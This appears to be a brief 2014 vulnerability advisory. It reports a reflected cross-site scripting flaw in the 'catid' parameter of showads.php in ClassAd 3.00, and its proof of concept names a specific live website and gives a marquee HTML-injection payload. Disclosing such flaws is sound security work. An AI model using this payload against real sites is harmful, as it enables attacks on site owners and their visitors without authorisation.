# Cross Site Scripting on ClassAd 
# Risk: Low
# CWE number: CWE-79
# Date: 19/05/2014
# Vendor: projects-and-software.de
# Version:3.00 
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on Windows 8 pro
# Vulnerable File: showads.php
# Exploit: http:/host/path/showads.php?catid=[xss]
# PoC:

[-]Target: http://petroman.de

[-]Vuln. File: /steckbrief/showads.php?catid=

[-]Exploit: "><marquee>Vulnerable</marquee>

# Thank's